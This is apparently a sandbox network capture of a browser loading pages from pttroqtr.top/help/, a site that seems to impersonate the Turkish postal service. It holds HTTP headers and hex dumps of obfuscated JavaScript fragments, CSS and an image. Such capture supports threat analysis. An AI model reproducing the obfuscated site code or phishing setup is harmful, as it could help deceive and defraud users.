                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 69 6e 64 27 5d 28 5f 30 78 34 62 35 34 66 62 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 36 61 35 29 5d 29 29 2c 27 24 77 61 74 63 68 27 3a 5f 30 78 34 32 63 32 32 35 3d 3e 65 6c 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 34 37 61 29 5d 28 5f 30 78 34 32 63 32 32 35 29 7d 29 2c 74 30 3d 28 5f 30 78 31 35 66 63 33 36 2c 5f 30 78 35 61 62 64 37 31 29 3d 3e 5f 30 78 31 35 66 63 33 36 21 3d 3d 45 65 26 26 21 5f 30 78 31 35 66 63 33 36 5b 27 5f 5f 69 73 53 63 72 69 70 74 27 2b 27 53 65 74 75 70 27 5d 26 26 64 65 28 5f 30 78 31 35 66 63 33 36 2c 5f 30 78 35 61 62 64 37 31 29 2c 70 6c 3d 7b 27 67 65 74 27 28 7b 5f 3a 5f 30 78 34 31 37 38 38 66 7d 2c 5f 30 78 33 66 31 64 63 35 29 7b 76 61 72 20 5f 30 78 35 61 63 64 66 65 3d 61 33 38 5f 30 78 33 62 39 38
                                                                                                                                                                                            Data Ascii: ind'](_0x4b54fb[a38_0x3b9877(0x6a5)])),'$watch':_0x42c225=>el[a38_0x3b9877(0x47a)](_0x42c225)}),t0=(_0x15fc36,_0x5abd71)=>_0x15fc36!==Ee&&!_0x15fc36['__isScript'+'Setup']&&de(_0x15fc36,_0x5abd71),pl={'get'({_:_0x41788f},_0x3f1dc5){var _0x5acdfe=a38_0x3b98
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 5f 30 78 33 62 39 38 37 37 28 30 78 31 65 63 29 2c 5a 30 3d 5f 30 78 31 65 32 39 63 37 3d 3e 72 65 28 5f 30 78 31 65 32 39 63 37 29 3f 5f 30 78 31 65 32 39 63 37 5b 61 33 38 5f 30 78 33 62 39 38 37 37 28 30 78 31 34 31 29 5d 28 65 74 29 3a 5b 65 74 28 5f 30 78 31 65 32 39 63 37 29 5d 2c 41 6c 3d 28 5f 30 78 35 37 37 33 61 37 2c 5f 30 78 31 38 33 63 64 65 2c 5f 30 78 62 61 66 62 35 33 29 3d 3e 7b 69 66 28 5f 30 78 31 38 33 63 64 65 5b 27 5f 6e 27 5d 29 72 65 74 75 72 6e 20 5f 30 78 31 38 33 63 64 65 3b 63 6f 6e 73 74 20 5f 30 78 33 61 66 38 33 64 3d 57 75 28 28 2e 2e 2e 5f 30 78 33 64 31 36 62 66 29 3d 3e 5a 30 28 5f 30 78 31 38 33 63 64 65 28 2e 2e 2e 5f 30 78 33 64 31 36 62 66 29 29 2c 5f 30 78 62 61 66 62 35 33 29 3b 72 65 74 75 72 6e 20 5f 30 78 33 61
                                                                                                                                                                                            Data Ascii: _0x3b9877(0x1ec),Z0=_0x1e29c7=>re(_0x1e29c7)?_0x1e29c7[a38_0x3b9877(0x141)](et):[et(_0x1e29c7)],Al=(_0x5773a7,_0x183cde,_0xbafb53)=>{if(_0x183cde['_n'])return _0x183cde;const _0x3af83d=Wu((..._0x3d16bf)=>Z0(_0x183cde(..._0x3d16bf)),_0xbafb53);return _0x3a
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 78 35 35 30 66 62 30 2c 5f 30 78 32 36 34 31 63 38 2c 5f 30 78 34 66 37 34 31 35 2c 5f 30 78 33 66 33 36 37 39 29 2c 28 5f 30 78 31 30 65 37 36 38 5b 5f 30 78 33 39 35 39 38 35 28 30 78 34 65 34 29 5d 21 3d 6e 75 6c 6c 7c 7c 5f 30 78 35 35 30 66 62 30 26 26 5f 30 78 31 30 65 37 36 38 3d 3d 3d 5f 30 78 35 35 30 66 62 30 5b 5f 30 78 33 39 35 39 38 35 28 30 78 33 34 35 29 5d 29 26 26 51 30 28 5f 30 78 32 30 66 38 61 37 2c 5f 30 78 31 30 65 37 36 38 2c 21 30 78 30 29 29 3a 5f 30 78 35 33 34 31 64 34 28 5f 30 78 32 30 66 38 61 37 2c 5f 30 78 31 30 65 37 36 38 2c 5f 30 78 32 63 39 32 38 31 2c 5f 30 78 31 66 36 63 65 63 2c 5f 30 78 35 35 30 66 62 30 2c 5f 30 78 32 36 34 31 63 38 2c 5f 30 78 34 66 37 34 31 35 2c 5f 30 78 33 66 33 36 37 39 2c 5f 30 78 33 63 37 63
                                                                                                                                                                                            Data Ascii: x550fb0,_0x2641c8,_0x4f7415,_0x3f3679),(_0x10e768[_0x395985(0x4e4)]!=null||_0x550fb0&&_0x10e768===_0x550fb0[_0x395985(0x345)])&&Q0(_0x20f8a7,_0x10e768,!0x0)):_0x5341d4(_0x20f8a7,_0x10e768,_0x2c9281,_0x1f6cec,_0x550fb0,_0x2641c8,_0x4f7415,_0x3f3679,_0x3c7c
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 65 3b 7d 66 6f 72 28 5f 30 78 33 37 36 32 61 30 3d 30 78 30 2c 5f 30 78 34 33 63 38 61 37 3d 5f 30 78 35 31 34 32 65 33 5b 5f 30 78 35 63 34 37 64 61 28 30 78 33 63 36 29 5d 2d 30 78 31 3b 5f 30 78 33 37 36 32 61 30 3c 5f 30 78 34 33 63 38 61 37 3b 29 5f 30 78 31 61 38 31 63 62 3d 5f 30 78 33 37 36 32 61 30 2b 5f 30 78 34 33 63 38 61 37 3e 3e 30 78 31 2c 5f 30 78 37 64 32 33 35 62 5b 5f 30 78 35 31 34 32 65 33 5b 5f 30 78 31 61 38 31 63 62 5d 5d 3c 5f 30 78 32 64 31 36 31 32 3f 5f 30 78 33 37 36 32 61 30 3d 5f 30 78 31 61 38 31 63 62 2b 30 78 31 3a 5f 30 78 34 33 63 38 61 37 3d 5f 30 78 31 61 38 31 63 62 3b 5f 30 78 32 64 31 36 31 32 3c 5f 30 78 37 64 32 33 35 62 5b 5f 30 78 35 31 34 32 65 33 5b 5f 30 78 33 37 36 32 61 30 5d 5d 26 26 28 5f 30 78 33 37 36
                                                                                                                                                                                            Data Ascii: e;}for(_0x3762a0=0x0,_0x43c8a7=_0x5142e3[_0x5c47da(0x3c6)]-0x1;_0x3762a0<_0x43c8a7;)_0x1a81cb=_0x3762a0+_0x43c8a7>>0x1,_0x7d235b[_0x5142e3[_0x1a81cb]]<_0x2d1612?_0x3762a0=_0x1a81cb+0x1:_0x43c8a7=_0x1a81cb;_0x2d1612<_0x7d235b[_0x5142e3[_0x3762a0]]&&(_0x376
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 30 64 29 3b 7d 6c 65 74 20 7a 73 3b 66 75 6e 63 74 69 6f 6e 20 57 61 28 5f 30 78 34 63 36 36 63 32 2c 5f 30 78 31 38 64 30 38 62 2c 5f 30 78 33 30 32 65 32 61 29 7b 76 61 72 20 5f 30 78 31 38 64 33 31 65 3d 61 33 38 5f 30 78 33 62 39 38 37 37 3b 63 6f 6e 73 74 20 5f 30 78 39 36 30 38 38 64 3d 5f 30 78 34 63 36 36 63 32 5b 27 74 79 70 65 27 5d 3b 69 66 28 21 5f 30 78 34 63 36 36 63 32 5b 5f 30 78 31 38 64 33 31 65 28 30 78 36 32 66 29 5d 29 7b 69 66 28 21 5f 30 78 31 38 64 30 38 62 26 26 7a 73 26 26 21 5f 30 78 39 36 30 38 38 64 5b 5f 30 78 31 38 64 33 31 65 28 30 78 36 32 66 29 5d 29 7b 63 6f 6e 73 74 20 5f 30 78 34 64 33 65 39 34 3d 5f 30 78 39 36 30 38 38 64 5b 27 74 65 6d 70 6c 61 74 65 27 5d 7c 7c 47 30 28 5f 30 78 34 63 36 36 63 32 29 5b 5f 30 78 31
                                                                                                                                                                                            Data Ascii: 0d);}let zs;function Wa(_0x4c66c2,_0x18d08b,_0x302e2a){var _0x18d31e=a38_0x3b9877;const _0x96088d=_0x4c66c2['type'];if(!_0x4c66c2[_0x18d31e(0x62f)]){if(!_0x18d08b&&zs&&!_0x96088d[_0x18d31e(0x62f)]){const _0x4d3e94=_0x96088d['template']||G0(_0x4c66c2)[_0x1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            10192.168.2.5497318.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC557OUTGET /help/assets/2dd339f2kFGym.css HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC348INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                            Content-Length: 53487
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"d0ef-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16036INData Raw: 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 39 30 70 78 7d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 39 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 34 37 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 38 30 70 78 7d 7d 62 6f 64 79 20 23 73 34 2d 72 69 62 62 6f 6e 72 6f 77 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 36 38 70 78 29 7b 23 77 65 62 6f 62 6a 5f 70 6f 72 74 61 6c 7b 70 61 64 64 69 6e 67 2d 74 6f
                                                                                                                                                                                            Data Ascii: @media screen and (min-width: 767px){.main-content{margin-top:90px}}@media screen and (min-width: 769px) and (max-width: 1047px){.main-content{margin-top:180px}}body #s4-ribbonrow{display:none}@media screen and (max-width: 468px){#webobj_portal{padding-to
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 65 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 74 72 61 6e 73 66 6f 72 6d 7d 2e 68 76 72 2d 66 6c 6f 61 74 2d 73 68 61 64 6f 77 3a 62 65 66 6f 72 65 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 74 6f 70 3a 31 30 30 25 3b 6c 65 66 74 3a 35 25 3b 68 65 69 67 68 74 3a 31 30 70 78 3b 77 69 64 74 68 3a 39 30 25 3b 6f 70 61 63 69 74 79 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 65 6c 6c 69 70 73 65 20 61 74 20 63 65 6e 74 65 72 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 35 29 30 2c 72 67 62
                                                                                                                                                                                            Data Ascii: e;transition-duration:.3s;transition-property:transform}.hvr-float-shadow:before{pointer-events:none;position:absolute;z-index:-1;content:"";top:100%;left:5%;height:10px;width:90%;opacity:0;background:radial-gradient(ellipse at center,rgba(0,0,0,.35)0,rgb
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 20 62 6f 75 6e 63 65 4f 75 74 55 70 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 32 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 32 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 32 30 30 30 70 78 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 44 6f 77 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 32 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                                                            Data Ascii: bounceOutUp{0%{transform:translateY(0)}20%{opacity:1;transform:translateY(20px)}to{opacity:0;transform:translateY(-2000px)}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeInDown{0%{opacity:0;transform:translateY(-20px)}to{opacity:1;transform
                                                                                                                                                                                            2024-09-28 03:39:26 UTC4683INData Raw: 2c 30 2c 2e 33 29 7d 23 77 65 62 6f 62 6a 5f 70 74 74 5f 66 61 79 64 61 6c 69 20 69 6d 67 7b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 23 70 61 67 65 5f 70 6f 72 74 61 6c 20 23 73 68 6f 72 74 63 75 74 6d 65 6e 75 20 2a 2c 23 73 68 6f 72 74 63 75 74 6d 65 6e 75 20 2a 2c 23 73 68 6f 72 74 63 75 74 6d 65 6e 75 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 23 73 68 6f 72 74 63 75 74 6d 65 6e 75 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 76 77 21 69 6d 70 6f 72 74 61 6e 74 7d 23 73 68 6f 72 74 63 75 74 6d 65 6e 75 20 2e 69 74 65 6d 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 68 65 69 67 68 74 3a 31 32 30 70 78 3b 70
                                                                                                                                                                                            Data Ascii: ,0,.3)}#webobj_ptt_faydali img{width:100%}@media (max-width:768px){#page_portal #shortcutmenu *,#shortcutmenu *,#shortcutmenu a{color:#fff!important}#shortcutmenu{float:none!important;padding-top:5vw!important}#shortcutmenu .item{float:left;height:120px;p


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            11192.168.2.5497308.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC557OUTGET /help/assets/4cd1ec68kFGym.css HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                            Content-Length: 323
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"143-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC323INData Raw: 68 31 2e 74 69 74 6c 65 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 63 6f 6c 6f 72 3a 23 32 34 35 34 39 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 64 69 76 2e 63 6f 6e 74 65 6e 74 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 32 66 32 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 7d 75 6c 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 64 69 73 63 20 6f 75 74 73 69 64 65 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 75 6c 5b 64 61 74 61 2d 76
                                                                                                                                                                                            Data Ascii: h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            12192.168.2.5497288.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC532OUTGET /help/assets/c16a2af0JxKnW.js HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC362INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Content-Length: 35443
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:44 GMT
                                                                                                                                                                                            ETag: W/"8a73-18fc3d84e20"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16022INData Raw: 76 61 72 20 61 32 33 5f 30 78 32 32 30 38 61 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 31 61 32 32 2c 5f 30 78 32 39 64 61 64 62 29 7b 76 61 72 20 5f 30 78 31 33 65 38 38 35 3d 61 32 33 5f 30 78 31 62 39 34 2c 5f 30 78 31 33 62 65 61 38 3d 5f 30 78 31 37 31 61 32 32 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 63 63 35 36 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32 63 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 65 38 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32
                                                                                                                                                                                            Data Ascii: var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x2
                                                                                                                                                                                            2024-09-28 03:39:26 UTC16384INData Raw: 61 63 62 28 30 78 31 62 65 29 5d 3d 3d 5f 30 78 34 66 36 61 63 62 28 30 78 32 61 31 29 2b 5f 30 78 34 66 36 61 63 62 28 30 78 32 39 33 29 2c 27 27 2b 5f 30 78 33 65 65 36 32 30 5b 5f 30 78 34 66 36 61 63 62 28 30 78 32 35 37 29 5d 3d 3d 5f 30 78 34 66 36 61 63 62 28 30 78 32 37 61 29 2b 5f 30 78 34 66 36 61 63 62 28 30 78 32 65 35 29 5d 29 3e 3d 30 78 33 3b 7d 66 75 6e 63 74 69 6f 6e 20 52 28 5f 30 78 33 61 31 62 63 65 29 7b 76 61 72 20 5f 30 78 32 30 34 38 39 39 3d 61 32 33 5f 30 78 32 32 30 38 61 35 2c 5f 30 78 33 30 62 65 35 36 3d 5f 30 78 33 61 31 62 63 65 5b 5f 30 78 32 30 34 38 39 39 28 30 78 32 66 35 29 5d 3b 69 66 28 5f 30 78 33 30 62 65 35 36 5b 5f 30 78 32 30 34 38 39 39 28 30 78 32 66 31 29 5d 3d 3d 3d 30 78 30 29 7b 76 61 72 20 5f 30 78 32 32
                                                                                                                                                                                            Data Ascii: acb(0x1be)]==_0x4f6acb(0x2a1)+_0x4f6acb(0x293),''+_0x3ee620[_0x4f6acb(0x257)]==_0x4f6acb(0x27a)+_0x4f6acb(0x2e5)])>=0x3;}function R(_0x3a1bce){var _0x204899=a23_0x2208a5,_0x30be56=_0x3a1bce[_0x204899(0x2f5)];if(_0x30be56[_0x204899(0x2f1)]===0x0){var _0x22
                                                                                                                                                                                            2024-09-28 03:39:26 UTC3037INData Raw: 36 33 28 30 78 32 30 34 29 5d 29 7b 63 61 73 65 20 30 78 30 3a 5f 30 78 33 31 62 62 65 62 3d 5f 30 78 35 38 33 35 31 61 5b 5f 30 78 62 35 64 34 34 34 5d 2c 5f 30 78 32 30 61 38 38 65 5b 5f 30 78 31 63 38 37 36 33 28 30 78 32 30 34 29 5d 3d 30 78 31 3b 63 61 73 65 20 30 78 31 3a 72 65 74 75 72 6e 20 5f 30 78 32 30 61 38 38 65 5b 27 74 72 79 73 27 5d 5b 5f 30 78 31 63 38 37 36 33 28 30 78 32 61 32 29 5d 28 5b 30 78 31 2c 30 78 33 2c 2c 30 78 34 5d 29 2c 5f 30 78 35 31 63 30 31 34 3d 5f 30 78 32 62 33 64 36 37 2c 5f 30 78 34 31 30 33 62 62 3d 5f 30 78 62 35 64 34 34 34 2c 5f 30 78 31 66 65 31 30 38 3d 7b 7d 2c 5b 30 78 34 2c 5f 30 78 33 31 62 62 65 62 28 29 5d 3b 63 61 73 65 20 30 78 32 3a 72 65 74 75 72 6e 20 5f 30 78 35 31 63 30 31 34 5b 5f 30 78 34 31 30
                                                                                                                                                                                            Data Ascii: 63(0x204)]){case 0x0:_0x31bbeb=_0x58351a[_0xb5d444],_0x20a88e[_0x1c8763(0x204)]=0x1;case 0x1:return _0x20a88e['trys'][_0x1c8763(0x2a2)]([0x1,0x3,,0x4]),_0x51c014=_0x2b3d67,_0x4103bb=_0xb5d444,_0x1fe108={},[0x4,_0x31bbeb()];case 0x2:return _0x51c014[_0x410


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            13192.168.2.5497268.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:25 UTC347OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:26 UTC326INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:26 GMT
                                                                                                                                                                                            Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                            Content-Length: 15215
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"3b6f-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:26 UTC15215INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 4e 00 00 01 5f 08 06 00 00 00 b8 3b 43 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 21 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 32 30 31 38 3a 30 39 3a 30 37 20 30 39 3a 31 36 3a 30 36 44 2f 69 55 00 00 3a b2 49 44 41 54 78 5e ed dd cf 76 54 c7 d5 f7 f1 aa d3 b6 61 f6 38 57 00 99 07 68 0d 13 c8 8a 7c 05 96 27 59 30 8a 7c 05 b4 af c0 e2 0a 10 57 60 79 84 56 26 16 57 e0 f6 0a 24 43 35 90 79 c4 15 bc 78 06 d8 7d ea ad 5d 55 2d 09 a1 3f 7d fe 57 d5 f9 7e d6 b2 e1 b4
                                                                                                                                                                                            Data Ascii: PNGIHDRN_;CVsRGBgAMAapHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<!tEXtCreation Time2018:09:07 09:16:06D/iU:IDATx^vTa8Wh|'Y0|W`yV&W$C5yx}]U-?}W~


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            14192.168.2.5497328.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
